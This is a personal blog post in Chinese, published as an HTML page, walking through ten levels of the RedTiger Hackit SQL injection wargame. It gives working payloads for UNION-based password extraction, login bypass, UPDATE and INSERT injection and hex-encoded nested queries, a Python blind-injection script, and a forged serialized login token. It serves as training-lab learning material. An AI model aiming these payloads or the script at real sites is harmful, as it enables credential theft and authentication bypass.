<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/icon.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/icon.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/icon.png?v=5.1.4">






  <meta name="keywords" content="SQLI,">










<meta name="description" content="Level1 (Simple-injection)需要得到 Hornoxe 的 password ，题目提示了所在的表名 level_users  测试 cat 参数，通过ORDER BY 测试得到 4 个字段，通过 UNION SELECT 测试，可以在第3,4字段输出 password ，构造如下Payload： https://redtiger.labs.overthewire.org/le">
<meta name="keywords" content="SQLI">
<meta property="og:type" content="article">
<meta property="og:title" content="Redtiger Hackit Write up">
<meta property="og:url" content="http://yoursite.com/2018/07/19/[Redtiger Hackit] Write up/index.html">
<meta property="og:site_name" content="ht&#39;s blog">
<meta property="og:description" content="Level1 (Simple-injection)需要得到 Hornoxe 的 password ，题目提示了所在的表名 level_users  测试 cat 参数，通过ORDER BY 测试得到 4 个字段，通过 UNION SELECT 测试，可以在第3,4字段输出 password ，构造如下Payload： https://redtiger.labs.overthewire.org/le">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-01-24T13:37:07.559Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Redtiger Hackit Write up">
<meta name="twitter:description" content="Level1 (Simple-injection)需要得到 Hornoxe 的 password ，题目提示了所在的表名 level_users  测试 cat 参数，通过ORDER BY 测试得到 4 个字段，通过 UNION SELECT 测试，可以在第3,4字段输出 password ，构造如下Payload： https://redtiger.labs.overthewire.org/le">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"remove","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/07/19/[Redtiger Hackit] Write up/">





  <title>Redtiger Hackit Write up | ht's blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ht's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Record something</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/07/19/[Redtiger Hackit] Write up/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ht">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ht's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Redtiger Hackit Write up</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-07-19T00:00:00+08:00">
                2018-07-19
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/SQLI/" itemprop="url" rel="index">
                    <span itemprop="name">SQLI</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h4 id="Level1-Simple-injection"><a href="#Level1-Simple-injection" class="headerlink" title="Level1 (Simple-injection)"></a>Level1 (Simple-injection)</h4><p>需要得到 <code>Hornoxe</code> 的 <code>password</code> ，题目提示了所在的表名 <code>level_users</code> </p>
<p>测试 <code>cat</code> 参数，通过<code>ORDER BY</code> 测试得到 4 个字段，通过 <code>UNION SELECT</code> 测试，可以在第3,4字段输出 <code>password</code> ，构造如下Payload：</p>
<p><code>https://redtiger.labs.overthewire.org/level1.php?cat=-1 UNION SELECT 1,2,password,4 FROM level1_users -- a</code></p>
<a id="more"></a>
<p>####Level2(Simple login-bypass)</p>
<p>绕过登录验证</p>
<p>分别测试 <code>Username</code> 和 <code>Password</code> ，在 <code>Username</code>  尝试  <code>1\&#39; or \&#39;1\&#39;=1\&#39;</code> ，<code>1\&#39; or \&#39;1\&#39;=\&#39;1\&#39; -- a</code>  失败，然后在 <code>password</code>  尝试万能密码 <code>1\&#39; or \&#39;1\&#39;=\&#39;1</code> 成功</p>
<p>####Level3 (Get an error)</p>
<p>提示去得到一个错误，和表名 <code>level3_users</code> </p>
<p>在 <code>usr</code> 后面插入 <code>[]</code> 会得到给出的错误提示：</p>
<p> <code>Warning:  preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25</code></p>
<p>根据这个提示，找到加密的 php代码，之后便用它来处理Payload，测试字段数，回显字段，构造提取 <code>password</code> 的Payload：</p>
<p><code>\&#39; AND \&#39;1\&#39;=\&#39;2\&#39; UNION SELECT 1,2,3,4,5,6,password FROM level3_users WHERE username=\&#39;Admin\&#39; --a</code></p>
<p>####Level4 (Blind injection)</p>
<p>题目提示了盲注，测试 <code>id</code>  参数，为 <strong>1</strong> 的时候，提示<code>Query returned 1 rows</code> ，为 其他值的时候 <code>Query returned  0 rows</code>  </p>
<p>通过 <code>https://redtiger.labs.overthewire.org/level4.php?id=0%2bif((length(keyword)=21),1,0)</code> ，确认 <code>keyword</code> ，长度为 21</p>
<p>那么附上 .py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exploit</span><span class="params">(param)</span>:</span></span><br><span class="line">	url = \<span class="string">"https://redtiger.labs.overthewire.org/level4.php?id=\"</span></span><br><span class="line"><span class="string">	cookie = &#123;\'level4login\':\'there_is_no_bug\'&#125;</span></span><br><span class="line"><span class="string">	url = url + param</span></span><br><span class="line"><span class="string">	</span></span><br><span class="line"><span class="string">	s = requests.get(url, cookies = cookie)</span></span><br><span class="line"><span class="string">	check = s.text[190:220]</span></span><br><span class="line"><span class="string">	</span></span><br><span class="line"><span class="string">	if check.find(\"Query returned 1 rows\") &gt; 0:</span></span><br><span class="line"><span class="string">		return 1</span></span><br><span class="line"><span class="string">	else:</span></span><br><span class="line"><span class="string">		return 0</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">flag = \"\"</span></span><br><span class="line"><span class="string">#打印字符ascii 32-126</span></span><br><span class="line"><span class="string">for i in range(1,22):</span></span><br><span class="line"><span class="string">	f = 32</span></span><br><span class="line"><span class="string">	e = 126</span></span><br><span class="line"><span class="string">	while(f &lt; e):</span></span><br><span class="line"><span class="string">		m = int((f + e) / 2)</span></span><br><span class="line"><span class="string">		if exploit(\"0%2Bif((substring(keyword,\"+str(i)+\",1)=\'\"+chr(m)+\"\'),1,0)\"):</span></span><br><span class="line"><span class="string">			flag = flag + chr(m)</span></span><br><span class="line"><span class="string">			break</span></span><br><span class="line"><span class="string">		elif exploit(\"0%2Bif((substring(keyword,\"+str(i)+\",1)&lt;\'\"+chr(m)+\"\'),1,0)\"):</span></span><br><span class="line"><span class="string">			e = m - 1</span></span><br><span class="line"><span class="string">		else :</span></span><br><span class="line"><span class="string">			f = m + 1</span></span><br><span class="line"><span class="string">	if (f == e):</span></span><br><span class="line"><span class="string">		flag = flag + chr(f)</span></span><br><span class="line"><span class="string">	print(\"Flag:\"+flag)</span></span><br></pre></td></tr></table></figure>
<p>####Level5 （Advanced login-bypass）</p>
<p>提示 非盲注，密码用MD5加密，查看错误。记得在 之前Wechall遇到过类似的题</p>
<p>USER NOT FOUND</p>
<p>Some things are disabled!!</p>
<p><strong>Warning</strong>:  mysql_num_rows() expects parameter 1 to be resource, boolean given in <strong>/var/www/html/hackit/level5.php</strong> on line <strong>46</strong></p>
<p><code>UNION SELECT</code>  测试出 <strong>2</strong> 个字段，构造Payload：</p>
<p><code>Username：\&#39; UNION SELECT 1,MD5(\&#39;1\&#39;) -- a</code> 和 <code>Password:1</code></p>
<p>####leve6   </p>
<p>照旧在 <code>user</code> 测试出有 <strong>5</strong> 个字段</p>
<p>然后测试回显<code>0 UNION SELECT 1,2,3,4,5 -- a</code> 或者 <code>0 UNION SELECT 1,2,3,4,5  FROM level6_users WHERE status=1 -- a</code> 提示 <code>User not found</code> </p>
<p>依次在每个字段测 <code>username</code> 发现只有在第2个字段时，显示 <code>admin</code>  的信息，在其他字段测试 <code>password</code>  却始终显示不出来</p>
<p>那么推测，<strong>后端的是查询了两次</strong>，利用第一次查询出的 <code>username</code> 作为下一次的查询条件，来查询出 <code>Email</code> ，那么构造Payload：</p>
<p><code>0 UNION SELECT 1,\&#39; UNION SELECT 1,username,3,password,5 FROM level6_users WHERE status=1 -- a,3,4,5 -- a</code></p>
<p>但还是报错，估计是因为引号的问题，那么就用十六进制的方式绕过，构造最终的Payload：</p>
<p><code>0 UNION SELECT 1,0x2720554e494f4e2053454c45435420312c757365726e616d652c332c70617373776f72642c352046524f4d206c6576656c365f7573657273205748455245207374617475733d31202d2d2061,3,4,5 -- a</code></p>
<h4 id="Level7"><a href="#Level7" class="headerlink" title="Level7"></a>Level7</h4><p>在搜索框输入单引号 <code>\&#39;</code>  会报错，显示出了执行的查询语句 <code>SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE \&#39;%google\&#39;%\&#39; OR text.title LIKE \&#39;%google\&#39;%\&#39;)</code></p>
<p>输入一个字母 <code>a</code> 并搜索，发现有4篇文章， <code>google</code> 在第3个，<strong>推测其 id 为 3</strong> </p>
<p>通过 <code>8%\&#39;) union select *,\&#39;2\&#39;,\&#39;3\&#39; from level7_news where id=3 AND (\&#39;%\&#39;=\&#39;</code> ，发现后面两个字段可以返回数据。</p>
<p>接下来就是构造Payload， 只要让之前的查询返回空就好，从而执行后面构造的查询。</p>
<p><code>8%\&#39;) union select \&#39;1\&#39;,\&#39;2\&#39;,news.* from level7_news news,level7_texts text where news.id=3 AND (\&#39;%\&#39;=\&#39;</code> </p>
<h4 id="Level8"><a href="#Level8" class="headerlink" title="Level8"></a>Level8</h4><p>测试四个参数，发现只有在 <code>Email</code> 处会有报错出现，注意到编辑功能的SQL语句类似于</p>
<p><code>UPDATE table_name SET Email=\&#39;$Email\&#39;,Name=\&#39;$Name\&#39;,ICQ=\&#39;$ICQ\&#39;,Age=\&#39;$Age\&#39; WHERE id=1</code></p>
<p>构造Payload：</p>
<p><code>Email: \&#39;, Email=password,name=\&#39;</code></p>
<h4 id="Level9"><a href="#Level9" class="headerlink" title="Level9"></a>Level9</h4><p>一个留言板界面，测试三个参数，发现在 <code>text</code> 框有报错，考虑到SQL语句：</p>
<p><code>INSERT INTO level9_users COLUMNS (name,title,text) VALUES (\&#39;$name\&#39;,\&#39;$title\&#39;,\&#39;$text\&#39;)</code></p>
<p>可以让它插入两行数据，构造如下Payload：</p>
<p><code>\&#39;), ((SELECT username FROM level9_users LiMIT 1),(SELECT password FROM level9_users LIMIT 1),\&#39;1</code></p>
<h4 id="Level10"><a href="#Level10" class="headerlink" title="Level10"></a>Level10</h4><p>打开后只有登录按钮，按 <code>F12</code> 检查元素，发现 <code>Form</code> 表单有一个隐藏的输入框，去掉 <code>hidden</code> 属性，发现是一串乱码，<code>Base64</code> 解码一下，发现是经过 PHP 序列化后的数组，修改 <code>username</code> 为 <code>admin</code>  ，<code>password</code> 为 <code>ture</code> 经过经过序列化，Base64 编码。得到Payload</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">serialize: a:<span class="number">2</span>:&#123;s:<span class="number">8</span>:\<span class="string">"username\";s:9:\"TheMaster\";s:8:\"password\";b:1;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">base64: YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=</span></span><br></pre></td></tr></table></figure>
<hr>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQLI/" rel="tag"># SQLI</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/07/09/[Wechall] MySQL Writeup/" rel="next" title="Wechall MySQL Write up">
                <i class="fa fa-chevron-left"></i> Wechall MySQL Write up
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/01/24/hello-world/" rel="prev" title="Hello World">
                Hello World <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ht</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> </div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a></div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
